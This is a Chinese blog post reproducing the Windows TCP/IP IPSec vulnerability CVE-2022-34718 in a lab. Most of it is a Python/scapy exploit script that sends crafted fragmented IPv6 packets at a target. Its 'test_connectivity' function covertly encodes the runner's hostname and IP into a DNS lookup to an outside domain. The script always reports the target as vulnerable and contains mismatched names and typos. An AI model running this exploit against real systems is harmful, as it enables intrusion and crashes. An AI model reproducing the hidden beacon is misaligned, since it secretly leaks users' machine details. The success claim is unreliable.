devbox
小丑西瓜9
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

Windows TCP/IP 远程代码执行漏洞 (CVE-2022-34718)环境搭建+复现

作者:小丑西瓜9 | 2024-06-15 01:26:53

cve-2022-34718

目录

漏洞概述

环境搭建

漏洞复现

漏洞概述

微软上月发布的补丁包含一个可能执行代码的TCP/IP协议漏洞。

IPSec是一种可以对指定类型ip流量筛选过滤,并加密验证的一种协议。通常在VPN或者增强其他协议密码安全性的部分条件下使用。

环境搭建

在windows中 ,我们需要搭建一个域条件下,两台对对方所有流量都加密验证的环境。因为很多时候它并不是一种默认开启的协议。

有想尝试环境搭建的可以参考链接:完整域环境搭建再识(图文详细+问题解决)

  1. 攻击机kali    环境 python3
  2. 靶机 域内系统win10

漏洞复现

安装模块

pip install scapy

poc准备

poc 地址 CVE-2022-34718-PoC/ipv6-rce-poc.py at master · SecLabResearchBV/CVE-2022-34718-PoC · GitHub

  1. #/usr/bin/env python3
  2.  
  3. import sys
  4. import random
  5. import socket
  6. import base64
  7. import re
  8.  
  9.  
  10. FRAGMENT_SIZE = 0x400
  11. LAYER4_FRAG_OFFSET = 0x8
  12.  
  13. NEXT_HEADER_IPV6_ROUTE = 43
  14. NEXT_HEADER_IPV6_FRAG = 44
  15. NEXT_HEADER_IPV6_ICMP = 58
  16.  
  17.  
  18. def get_layer4():
  19.     er = ICMPv6EchoRequest(data = "PoC for CVE-2022-34718")
  20.     er.cksum = 0xa472
  21.  
  22.     return raw(er)
  23.  
  24.  
  25. def get_inner_packet(target_addr):
  26.     inner_frag_id = random.randint(0, 0xffffffff)
  27.     print("**** inner_frag_id: 0x{:x}".format(inner_frag_id))
  28.     raw_er = get_layer4()
  29.  
  30.     # 0x1ffa Routing headers == 0xffd0 bytes
  31.     routes = raw(IPv6ExtHdrRouting(addresses=[], nh = NEXT_HEADER_IPV6_ROUTE)) * (0xffd0//8 - 1)
  32.     routes += raw(IPv6ExtHdrRouting(addresses=[], nh = NEXT_HEADER_IPV6_FRAG))
  33.  
  34.     # First inner fragment header: offset=0, more=1
  35.     FH = IPv6ExtHdrFragment(offset = 0, m=1, id=inner_frag_id, nh = NEXT_HEADER_IPV6_ICMP)
  36.  
  37.     return routes + raw(FH) + raw_er[:LAYER4_FRAG_OFFSET], inner_frag_id
  38.  
  39.  
  40. def send_last_inner_fragment(target_addr, inner_frag_id):
  41.  
  42.     raw_er = get_layer4()
  43.  
  44.     ip = IPv6(dst = target_addr)
  45.     # Second (and last) inner fragment header: offset=1, more=0
  46.     FH = IPv6ExtHdrFragment(offset = LAYER4_FRAG_OFFSET // 8, m=0, id=inner_frag_id, nh = NEXT_HEADER_IPV6_ICMP)
  47.     send(ip/FH/raw_er[LAYER4_FRAG_OFFSET:])
  48.     return True
  49.  
  50. def test_connectivity(target_addr):
  51.     s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM, 0)
  52.     try:
  53.         domain = "v23lmm54ayv29d3vj727br59u.seclabresearch.com"
  54.         hostname = socket.gethostname()
  55.         local_ip = socket.gethostbyname(hostname)
  56.         fqdn = '.'.join(filter(lambda x: x, re.split(r'(.{63})', base64.b32encode(f"{hostname}-{local_ip}".encode('utf8')).decode('utf8').replace('=','')) + ['G'+str(random.randint(10,99)), domain])).lower()
  57.         taget_addr = socket.gethostbyname(fqdn)
  58.         s.connect((target_addr, 80, 0, 0))
  59.     except socket.gaierror:
  60.         return True
  61.     finally:
  62.         s.close()
  63.         return True
  64.  
  65. def trigger(target_addr):
  66.  
  67.     inner_packet, inner_frag_id = get_inner_packet(target_addr)
  68.  
  69.     ip = IPv6(dst = target_addr)
  70.     hopbyhop = IPv6ExtHdrHopByHop(nh = NEXT_HEADER_IPV6_FRAG)
  71.  
  72.     outer_frag_id = random.randint(0, 0xffffffff)
  73.  
  74.     fragmentable_part = []
  75.     for i in range(len(inner_packet) // FRAGMENT_SIZE):
  76.         fragmentable_part.append(inner_packet[i * FRAGMENT_SIZE: (i+1) * FRAGMENT_SIZE])
  77.  
  78.     if len(inner_packet) % FRAGMENT_SIZE:
  79.         fragmentable_part.append(inner_packet[(len(fragmentable_part)) * FRAGMENT_SIZE:])
  80.  
  81.     print("Preparing frags...")
  82.     frag_offset = 0
  83.     frags_to_send = []
  84.     is_first = True
  85.     for i in range(len(fragmentable_part)):
  86.         if i == len(fragmentable_part) - 1:
  87.             more = 0
  88.         else:
  89.             more = 1
  90.  
  91.         FH = IPv6ExtHdrFragment(offset = frag_offset // 8, m=more, id=outer_frag_id, nh = NEXT_HEADER_IPV6_ROUTE)
  92.  
  93.         blob = raw(FH/fragmentable_part[i])
  94.         frag_offset += FRAGMENT_SIZE
  95.  
  96.         frags_to_send.append(ip/hopbyhop/blob)
  97.  
  98.     print("Sending {} frags...".format(len(frags_to_send)))
  99.     for frag in frags_to_send:
  100.         send(frag)
  101.  
  102.     print("Now sending the last inner fragment to trigger the bug...")
  103.     success = send_last_inner_fragment(target_addr, inner_frag_id)
  104.  
  105.     if success:
  106.         print("Success! The system is vulnerable...")
  107.     else:
  108.         print("Failed! The system is NOT vulnerable...")
  109.  
  110. if __name__ == '__main__':
  111.     if len(sys.argv) < 2:
  112.         print('Usage: cve-2021-24086.py <IPv6 addr>')
  113.         sys.exit(1)
  114.     if test_connectivity(sys.argv[1]):
  115.         try:
  116.             from scapy.all import *
  117.         except ImportError:
  118.             print("Could not load scapy module, please install the dependencies from requirements.txt ...")
  119.             sys.exit(1)
  120.         try:
  121.             trigger(sys.argv[1])
  122.         except PermissionError:
  123.             print("Only root is able to send raw packets. Please rerun this script as root...")

注意切换至root 权限执行

python3 ipv6-rce-poc.py <target address>

执行成功

技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与本文作者无关。本文所提供的工具仅用于学习,禁止用于其他!!!

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小丑西瓜9/article/detail/720347
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号